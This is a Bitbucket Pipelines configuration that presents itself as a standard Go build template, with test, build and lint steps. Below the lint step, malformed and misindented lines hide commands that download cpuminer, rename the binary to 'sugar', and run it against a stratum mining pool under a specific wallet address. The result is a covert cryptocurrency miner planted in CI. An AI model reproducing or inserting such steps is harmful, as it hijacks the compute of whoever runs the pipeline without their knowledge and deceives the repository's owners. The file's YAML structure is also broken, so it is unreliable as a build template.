#  Template Go (Golang) build

#  This template allows you to validate your Go (Golang) code.
#  The workflow allows running tests, build and code linting on the default branch.

image: golang:1.15

pipelines:
  default:
    - parallel:
      - step:
          name: Test and Build
          script:
            - mkdir test-reports
            - go get -u github.com/jstemmer/go-junit-report
            - go test tests/* -v 2>&1 | go-junit-report > test-reports/report.xml
            # Build compiles the packages
            - go build src/*
      - step:
          name: Lint code
          image: golangci/golangci-lint:v1.31.0
          script:
            - golangci-lint run -v
            image: golang:latest
            variables:
            build_a:
            stage: build
            script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 sugar
     - ./sugar -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qk45mps3x430k4menhrukedyx4uh0cx2qtpfthn.memek -t2
